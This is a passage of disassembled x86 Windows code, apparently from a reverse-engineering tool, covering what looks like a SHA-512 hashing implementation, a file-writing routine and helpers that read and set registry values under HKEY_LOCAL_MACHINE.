		and	eax, [esp+170h+var_128]
		shl	ebx, 19h
		xor	eax, [esp+170h+var_90]
		or	ecx, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_94]
		and	ecx, [esp+170h+var_124]
		xor	edx, edi
		xor	ecx, [esp+170h+var_8C]
		add	esi, eax
		adc	edx, ecx
		add	[esp+170h+var_140], esi
		adc	[esp+170h+var_13C], edx
		cmp	[esp+170h+var_15C], 0
		jz	loc_416C2F
		mov	eax, [esp+170h+var_A0]
		mov	ecx, [esp+170h+var_9C]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_9C]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_F8]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_F4]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_F8]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_F4]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_D8]
		adc	edx, [esp+170h+var_D4]
		add	ecx, [esp+170h+var_C0]
		adc	edx, [esp+170h+var_BC]
		mov	[eax+0B8h], ecx
		mov	[eax+0BCh], edx
		mov	eax, edx
		mov	[esp+170h+var_C0], ecx
		mov	[esp+170h+var_BC], eax
		mov	[esp+170h+var_30], ecx
		jmp	short loc_416C44
; ---------------------------------------------------------------------------

loc_416C2F:				; CODE XREF: sub_414BC0+1F7Ej
		mov	edx, [esp+170h+var_C0]
		mov	eax, [esp+170h+var_BC]
		mov	[esp+170h+var_30], edx

loc_416C44:				; CODE XREF: sub_414BC0+206Dj
		mov	ecx, [esp+170h+var_11C]
		mov	ebx, ecx
		mov	[esp+170h+var_2C], eax
		mov	eax, [esp+170h+var_120]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_11C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		shr	ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_158]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_11C]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_154]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_148]
		not	ebx
		and	ebx, [esp+170h+var_14C]
		not	edi
		and	edi, [esp+170h+var_150]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_41FA60[eax*8]
		adc	esi, ds:dword_41FA64[eax*8]
		add	edx, [esp+170h+var_30]
		mov	eax, [esp+170h+var_128]
		adc	esi, [esp+170h+var_2C]
		add	ecx, edx
		mov	edx, [esp+170h+var_144]
		adc	edx, esi
		add	eax, ecx
		adc	[esp+170h+var_124], edx
		mov	[esp+170h+var_148], ecx
		mov	ecx, [esp+170h+var_140]
		mov	[esp+170h+var_144], edx
		mov	edx, [esp+170h+var_13C]
		mov	ebx, ecx
		mov	ebp, edx
		shrd	ebx, ebp, 1Ch
		xor	edi, edi
		or	edi, ebx
		mov	esi, ecx
		mov	ebx, edx
		shld	edx, ecx, 1Eh
		shr	ebp, 1Ch
		shl	esi, 4
		or	esi, ebp
		shr	ebx, 2
		shl	ecx, 1Eh
		xor	ebp, ebp
		or	ebx, ecx
		mov	[esp+170h+var_128], eax
		or	ebp, edx
		mov	ecx, [esp+170h+var_13C]
		xor	esi, ebp
		mov	ebp, [esp+170h+var_140]
		mov	edx, ecx
		shld	ecx, ebp, 19h
		xor	edi, ebx
		shr	edx, 7
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_98]
		and	ecx, [esp+170h+var_140]
		shl	ebp, 19h
		xor	ecx, [esp+170h+var_90]
		or	edx, ebp
		xor	edi, edx
		mov	edx, [esp+170h+var_94]
		and	edx, [esp+170h+var_13C]
		xor	esi, ebx
		xor	edx, [esp+170h+var_8C]
		add	edi, ecx
		adc	esi, edx
		add	[esp+170h+var_148], edi
		adc	[esp+170h+var_144], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_416E90
		mov	eax, [esp+170h+var_B0]
		mov	ecx, [esp+170h+var_AC]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_AC]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_E0]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_DC]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_E0]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_DC]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_118]
		adc	edx, [esp+170h+var_114]
		add	ecx, [esp+170h+var_A0]
		adc	edx, [esp+170h+var_9C]
		mov	[eax+0C0h], ecx
		mov	[eax+0C4h], edx
		mov	eax, edx
		mov	[esp+170h+var_9C], eax
		mov	[esp+170h+var_1C], eax
		mov	eax, [esp+170h+var_128]
		mov	[esp+170h+var_A0], ecx
		mov	[esp+170h+var_20], ecx
		jmp	short loc_416EAC
; ---------------------------------------------------------------------------

loc_416E90:				; CODE XREF: sub_414BC0+21CEj
		mov	edx, [esp+170h+var_A0]
		mov	ecx, [esp+170h+var_9C]
		mov	[esp+170h+var_20], edx
		mov	[esp+170h+var_1C], ecx

loc_416EAC:				; CODE XREF: sub_414BC0+22CEj
		mov	ecx, [esp+170h+var_124]
		mov	ebx, ecx
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_124]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_120]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_124]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_11C]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_14C]
		not	ebx
		and	ebx, [esp+170h+var_154]
		not	edi
		and	edi, [esp+170h+var_158]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_41FA68[eax*8]
		adc	esi, ds:dword_41FA6C[eax*8]
		add	edx, [esp+170h+var_20]
		mov	eax, [esp+170h+var_150]
		adc	esi, [esp+170h+var_1C]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_130], eax
		mov	[esp+170h+var_14C], ecx
		mov	[esp+170h+var_150], eax
		adc	[esp+170h+var_12C], ecx
		mov	eax, [esp+170h+var_144]
		mov	ecx, [esp+170h+var_148]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ecx, eax
		mov	ebx, [esp+170h+var_148]
		mov	ebp, eax
		shld	ebp, ebx, 19h
		xor	edx, edx
		or	edx, ebp
		mov	ebp, [esp+170h+var_13C]
		xor	ebp, [esp+170h+var_134]
		shl	ebx, 19h
		shr	ecx, 7
		or	ecx, ebx
		xor	esi, edx
		mov	edx, [esp+170h+var_140]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_138]
		and	ebp, eax
		mov	eax, [esp+170h+var_13C]
		and	eax, [esp+170h+var_134]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_148]
		and	edx, ecx
		xor	ebx, edx
		xor	ebp, eax
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_150], edi
		adc	[esp+170h+var_14C], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_4170DA
		mov	eax, [esp+170h+var_C0]
		mov	ecx, [esp+170h+var_BC]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_BC]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_100]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_FC]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_100]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_FC]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_C8]
		adc	edx, [esp+170h+var_C4]
		add	ecx, [esp+170h+var_E0]
		adc	edx, [esp+170h+var_DC]
		mov	[eax+0C8h], ecx
		mov	[eax+0CCh], edx
		mov	eax, edx
		mov	[esp+170h+var_E0], ecx
		mov	[esp+170h+var_DC], eax
		mov	[esp+170h+var_10], ecx
		jmp	short loc_4170EF
; ---------------------------------------------------------------------------

loc_4170DA:				; CODE XREF: sub_414BC0+2429j
		mov	edx, [esp+170h+var_E0]
		mov	eax, [esp+170h+var_DC]
		mov	[esp+170h+var_10], edx

loc_4170EF:				; CODE XREF: sub_414BC0+2518j
		mov	ecx, [esp+170h+var_12C]
		mov	ebx, ecx
		mov	[esp+170h+var_C], eax
		mov	eax, [esp+170h+var_130]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_12C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_128]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_12C]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_124]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_154]
		not	ebx
		and	ebx, [esp+170h+var_11C]
		not	edi
		and	edi, [esp+170h+var_120]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_41FA70[eax*8]
		adc	esi, ds:dword_41FA74[eax*8]
		add	edx, [esp+170h+var_10]
		mov	eax, [esp+170h+var_158]
		adc	esi, [esp+170h+var_C]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_138], eax
		mov	[esp+170h+var_154], ecx
		mov	[esp+170h+var_158], eax
		adc	[esp+170h+var_134], ecx
		mov	ecx, [esp+170h+var_150]
		mov	eax, [esp+170h+var_14C]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	edi, edi
		or	edi, edx
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shr	edx, 2
		shl	ecx, 1Eh
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ebx, [esp+170h+var_150]
		mov	ebp, eax
		shld	ebp, ebx, 19h
		shl	ebx, 19h
		xor	edx, edx
		or	edx, ebp
		mov	ecx, eax
		shr	ecx, 7
		or	ecx, ebx
		xor	edi, ecx
		mov	ecx, [esp+170h+var_150]
		xor	esi, edx
		mov	edx, [esp+170h+var_140]
		mov	ebx, ecx
		and	ecx, edx
		xor	ebx, edx
		and	ebx, [esp+170h+var_148]
		mov	ebp, eax
		xor	ebp, [esp+170h+var_13C]
		mov	edx, ecx
		and	ebp, [esp+170h+var_144]
		mov	ecx, [esp+170h+var_13C]
		and	eax, ecx
		xor	ebx, edx
		xor	ebp, eax
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_158], edi
		mov	edi, [esp+170h+var_15C]
		adc	[esp+170h+var_154], esi
		add	edi, 10h
		cmp	edi, 50h
		mov	[esp+170h+var_15C], edi
		jb	loc_414D50
		mov	eax, [esp+170h+var_4]
		mov	edx, [esp+170h+var_158]
		add	[eax], edx
		mov	edx, [esp+170h+var_154]
		pop	edi
		adc	[eax+4], edx
		mov	eax, [esp+16Ch+arg_0]
		mov	edx, [esp+16Ch+var_150]
		add	[eax+18h], edx
		mov	edx, [esp+16Ch+var_14C]
		pop	esi
		adc	[eax+1Ch], edx
		mov	edx, [esp+168h+var_148]
		add	[eax+20h], edx
		mov	edx, [esp+168h+var_144]
		pop	ebp
		adc	[eax+24h], edx
		mov	edx, [esp+164h+var_140]
		add	[eax+28h], edx
		mov	edx, [esp+164h+var_134]
		pop	ebx
		adc	[eax+2Ch], ecx
		mov	ecx, [esp+160h+var_138]
		add	[eax+30h], ecx
		mov	ecx, [esp+160h+var_130]
		adc	[eax+34h], edx
		add	[eax+38h], ecx
		mov	edx, [esp+160h+var_12C]
		mov	ecx, [esp+160h+var_128]
		adc	[eax+3Ch], edx
		add	[eax+40h], ecx
		mov	edx, [esp+160h+var_124]
		mov	ecx, [esp+160h+var_120]
		adc	[eax+44h], edx
		add	[eax+48h], ecx
		mov	edx, [esp+160h+var_11C]
		adc	[eax+4Ch], edx
		add	esp, 160h
		retn
sub_414BC0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_4172D0	proc near		; CODE XREF: .text:00417552p
					; sub_41BDAA+CAp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

		push	ecx
		mov	ecx, [ebx]
		push	ebp
		and	ecx, 7Fh
		push	esi
		lea	esi, [ecx+7]
		shr	esi, 3
		push	edi
		mov	[esp+10h+var_4], ecx
		jz	short loc_417335
		lea	edx, [ebx+esi*8+50h]

loc_4172E9:				; CODE XREF: sub_4172D0+5Fj
		mov	eax, [edx-8]
		mov	ecx, [edx-4]
		sub	edx, 8
		mov	edi, eax
		sub	esi, 1
		ror	edi, 8
		and	edi, 0FF00FF00h
		rol	eax, 8
		and	eax, 0FF00FFh
		or	edi, eax
		mov	ebp, ecx
		xor	eax, eax
		ror	ebp, 8
		and	ebp, 0FF00FF00h
		rol	ecx, 8
		and	ecx, 0FF00FFh
		or	ebp, ecx
		xor	ecx, ecx
		or	eax, ebp
		or	edi, ecx
		test	esi, esi
		mov	[edx], eax
		mov	[edx+4], edi
		jnz	short loc_4172E9
		mov	ecx, [esp+10h+var_4]

loc_417335:				; CODE XREF: sub_4172D0+13j
		mov	eax, ecx
		and	eax, 7
		add	eax, eax
		add	eax, eax
		mov	esi, dword_425BA8[eax+eax]
		mov	edi, dword_425BAC[eax+eax]
		add	eax, eax
		mov	edx, ecx
		shr	edx, 3
		and	esi, [ebx+edx*8+50h]
		and	edi, [ebx+edx*8+54h]
		or	esi, dword_425BE8[eax]
		or	edi, dword_425BEC[eax]
		cmp	ecx, 6Fh
		mov	[ebx+edx*8+50h], esi
		mov	[ebx+edx*8+54h], edi
		jbe	short loc_41739A
		cmp	ecx, 78h
		jnb	short loc_41738D
		mov	dword ptr [ebx+0C8h], 0
		mov	dword ptr [ebx+0CCh], 0

loc_41738D:				; CODE XREF: sub_4172D0+A7j
		push	ebx
		call	sub_414BC0
		add	esp, 4
		xor	edx, edx
		jmp	short loc_4173A2
; ---------------------------------------------------------------------------

loc_41739A:				; CODE XREF: sub_4172D0+A2j
		add	edx, 1
		cmp	edx, 0Eh
		jnb	short loc_4173C8

loc_4173A2:				; CODE XREF: sub_4172D0+C8j
		mov	ecx, 0Dh
		sub	ecx, edx
		add	ecx, ecx
		add	ecx, ecx
		lea	esi, [ebx+edx*8+50h]
		add	ecx, ecx
		shr	ecx, 2
		lea	edi, [esi+8]
		mov	dword ptr [esi], 0
		mov	dword ptr [esi+4], 0
		rep movsd

loc_4173C8:				; CODE XREF: sub_4172D0+D0j
		mov	edx, [ebx+8]
		mov	esi, [ebx+0Ch]
		mov	ecx, [ebx+4]
		mov	eax, [ebx]
		shld	esi, edx, 3
		add	edx, edx
		mov	edi, ecx
		shld	ecx, eax, 3
		add	edx, edx
		add	eax, eax
		add	edx, edx
		add	eax, eax
		shr	edi, 1Dh
		xor	ebp, ebp
		or	edx, edi
		add	eax, eax
		or	esi, ebp
		push	ebx
		mov	[ebx+0C0h], edx
		mov	[ebx+0C4h], esi
		mov	[ebx+0C8h], eax
		mov	[ebx+0CCh], ecx
		call	sub_414BC0
		add	esp, 4
		xor	esi, esi

loc_417415:				; CODE XREF: sub_4172D0+171j
		mov	ecx, esi
		not	ecx
		and	ecx, 7
		mov	edx, esi
		shr	edx, 3
		mov	eax, [ebx+edx*8+10h]
		mov	edx, [ebx+edx*8+14h]
		add	ecx, ecx
		add	ecx, ecx
		add	ecx, ecx
		call	sub_411C90
		mov	ecx, [esp+10h+arg_0]
		mov	[esi+ecx], al
		add	esi, 1
		cmp	esi, 40h
		jb	short loc_417415
		pop	edi
		pop	esi
		pop	ebp
		pop	ecx
		retn
sub_4172D0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_417450	proc near		; CODE XREF: sub_41BDAA+A3p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		sub	esp, 0Ch
		push	ebx
		mov	ebx, [esp+10h+arg_4]
		mov	eax, [ebx]
		push	ebp
		mov	ebp, [esp+14h+arg_0]
		push	esi
		push	edi
		and	eax, 7Fh
		mov	edi, 80h
		sub	edi, eax
		mov	esi, ecx
		xor	ecx, ecx
		add	[ebx], ebp
		adc	[ebx+4], ecx
		mov	edx, [ebx+4]
		cmp	edx, ecx
		ja	short loc_41748B
		jb	short loc_417483
		mov	ecx, [ebx]
		cmp	ecx, ebp
		jnb	short loc_41748B

loc_417483:				; CODE XREF: sub_417450+2Bj
		add	dword ptr [ebx+8], 1
		adc	dword ptr [ebx+0Ch], 0

loc_41748B:				; CODE XREF: sub_417450+29j
					; sub_417450+31j
		cmp	ebp, edi
		jb	loc_41752F

loc_417493:				; CODE XREF: sub_417450+D9j
		push	edi
		lea	edx, [ebx+eax+50h]
		push	esi
		push	edx
		call	sub_407FA0
		add	esi, edi
		add	esp, 0Ch
		sub	ebp, edi
		mov	[esp+1Ch+var_4], esi
		mov	[esp+1Ch+arg_0], ebp
		mov	edi, 80h
		mov	[esp+1Ch+var_8], 0
		mov	esi, 10h
		lea	edx, [ebx+0D0h]

loc_4174C6:				; CODE XREF: sub_417450+BCj
		mov	eax, [edx-8]
		mov	ecx, [edx-4]
		sub	edx, 8
		mov	ebx, eax
		sub	esi, 1
		ror	ebx, 8
		and	ebx, 0FF00FF00h
		rol	eax, 8
		and	eax, 0FF00FFh
		or	ebx, eax
		mov	ebp, ecx
		xor	eax, eax
		ror	ebp, 8
		and	ebp, 0FF00FF00h
		rol	ecx, 8
		and	ecx, 0FF00FFh
		or	ebp, ecx
		xor	ecx, ecx
		or	eax, ebp
		or	ebx, ecx
		test	esi, esi
		mov	[edx], eax
		mov	[edx+4], ebx
		jnz	short loc_4174C6
		mov	ebx, [esp+1Ch+arg_4]
		push	ebx
		call	sub_414BC0
		mov	ebp, [esp+20h+arg_0]
		mov	eax, [esp+20h+var_8]
		mov	esi, [esp+20h+var_4]
		add	esp, 4
		cmp	ebp, edi
		jnb	loc_417493

loc_41752F:				; CODE XREF: sub_417450+3Dj
		push	ebp
		lea	edx, [eax+ebx+50h]
		push	esi
		push	edx
		call	sub_407FA0
		add	esp, 0Ch
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		add	esp, 0Ch
		retn
sub_417450	endp

; ---------------------------------------------------------------------------
		align 10h
		push	ecx
		push	eax
		call	sub_4172D0
		add	esp, 4
		pop	ecx
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41755C	proc near		; CODE XREF: sub_41755C+D5p
					; sub_41AFA7+667p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_C		= word ptr  14h
arg_14		= dword	ptr  1Ch
arg_1C		= dword	ptr  24h
arg_20		= dword	ptr  28h
arg_24		= dword	ptr  2Ch
arg_28		= byte ptr  30h
arg_2B		= byte ptr  33h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		cmp	[ebp+arg_28], 0
		push	ebx
		push	esi
		push	edi
		jz	short loc_417575
		mov	ecx, [ebp+arg_4]
		shr	ecx, 18h
		or	cl, 1
		jmp	short loc_41757B
; ---------------------------------------------------------------------------

loc_417575:				; CODE XREF: sub_41755C+Cj
		mov	cl, byte ptr [ebp+arg_4+3]
		and	cl, 0FEh

loc_41757B:				; CODE XREF: sub_41755C+17j
		movzx	eax, word ptr [ebp+arg_24]
		mov	ebx, [ebp+arg_20]
		lea	edx, [ebx+18h]
		cmp	edx, eax
		ja	short loc_417598
		lea	edx, [ebx+18h]
		mov	[ebp+arg_14], ebx
		or	cl, 2
		mov	[ebp+arg_2B], 0
		jmp	short loc_4175A9
; ---------------------------------------------------------------------------

loc_417598:				; CODE XREF: sub_41755C+2Bj
		mov	dx, word ptr [ebp+arg_24]
		add	eax, 0FFFFFFE8h
		mov	[ebp+arg_14], eax
		and	cl, 0FDh
		mov	[ebp+arg_2B], 1

loc_4175A9:				; CODE XREF: sub_41755C+3Aj
		movzx	eax, dx
		push	eax
		mov	byte ptr [ebp+arg_4+3],	cl
		mov	[ebp+arg_C], dx
		mov	[ebp+var_4], eax
		call	sub_403AA0
		test	eax, eax
		pop	ecx
		mov	[ebp+arg_20], eax
		jz	loc_417648
		push	6
		pop	ecx
		mov	edi, eax
		lea	esi, [ebp+arg_4]
		rep movsd
		mov	edi, [ebp+arg_14]
		mov	esi, [ebp+arg_1C]
		push	edi
		add	eax, 18h
		push	esi
		push	eax
		call	sub_407FA0
		add	esp, 0Ch
		push	0
		lea	eax, [ebp+var_8]
		push	eax
		push	[ebp+var_4]
		push	[ebp+arg_20]
		push	[ebp+arg_0]
		call	ds:dword_41D088	; WriteFile
		test	eax, eax
		jz	short loc_41763F
		mov	eax, [ebp+var_4]
		cmp	[ebp+var_8], eax
		jnz	short loc_41763F
		push	[ebp+arg_20]
		call	sub_4039C3
		cmp	[ebp+arg_2B], 0
		pop	ecx
		jz	short loc_41763B
		push	0
		push	[ebp+arg_24]
		sub	ebx, edi
		push	ebx
		add	edi, esi
		push	edi
		sub	esp, 18h
		push	6
		pop	ecx
		mov	edi, esp
		push	[ebp+arg_0]
		lea	esi, [ebp+arg_4]
		rep movsd
		call	sub_41755C
		add	esp, 2Ch
		jmp	short loc_41764A
; ---------------------------------------------------------------------------

loc_41763B:				; CODE XREF: sub_41755C+B8j
		mov	al, 1
		jmp	short loc_41764A
; ---------------------------------------------------------------------------

loc_41763F:				; CODE XREF: sub_41755C+A1j
					; sub_41755C+A9j
		push	[ebp+arg_20]
		call	sub_4039C3
		pop	ecx

loc_417648:				; CODE XREF: sub_41755C+66j
		xor	al, al

loc_41764A:				; CODE XREF: sub_41755C+DDj
					; sub_41755C+E1j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_41755C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41764F	proc near		; CODE XREF: sub_417776+154p
					; sub_417909+152p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		xor	ebx, ebx
		push	ebx
		lea	eax, [ebp+var_4]
		push	eax
		push	ebx
		push	0F003Fh
		push	ebx
		push	ebx
		push	ebx
		push	[ebp+arg_0]
		push	80000002h
		call	ds:off_41D004
		test	eax, eax
		jz	short loc_417684
		push	[ebp+var_4]
		call	ds:dword_41D010	; RegCloseKey
		xor	al, al

loc_417681:				; CODE XREF: sub_41764F+68j
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_417684:				; CODE XREF: sub_41764F+25j
		mov	eax, [ebp+arg_8]
		push	esi
		lea	esi, [eax+1]

loc_41768B:				; CODE XREF: sub_41764F+41j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41768B
		sub	eax, esi
		push	eax
		push	[ebp+arg_8]
		push	1
		push	ebx
		push	[ebp+arg_4]
		push	[ebp+var_4]
		call	ds:off_41D00C
		test	eax, eax
		pop	esi
		jz	short loc_4176B9

loc_4176AC:				; CODE XREF: sub_41764F+6Cj
		push	[ebp+var_4]
		call	ds:dword_41D010	; RegCloseKey
		mov	al, bl
		jmp	short loc_417681
; ---------------------------------------------------------------------------

loc_4176B9:				; CODE XREF: sub_41764F+5Bj
		mov	bl, 1
		jmp	short loc_4176AC
sub_41764F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4176BD	proc near		; CODE XREF: sub_417776+113p
					; sub_417909+100p ...

var_4		= dword	ptr -4
arg_0		= byte ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		push	ecx
		lea	eax, [ebp+var_4]
		push	eax
		push	1
		push	0
		push	[ebp+arg_4]
		push	80000002h
		call	ds:off_41D02C
		test	eax, eax
		jnz	short loc_417705
		lea	eax, [ebp+arg_10]
		push	eax
		push	[ebp+arg_C]
		lea	eax, [ebp+arg_0]
		push	eax
		push	0
		push	[ebp+arg_8]
		push	[ebp+var_4]
		call	ds:off_41D008
		test	eax, eax
		jnz	short loc_417705
		push	[ebp+var_4]
		call	ds:dword_41D010	; RegCloseKey
		mov	al, 1
		leave
		retn
; ---------------------------------------------------------------------------

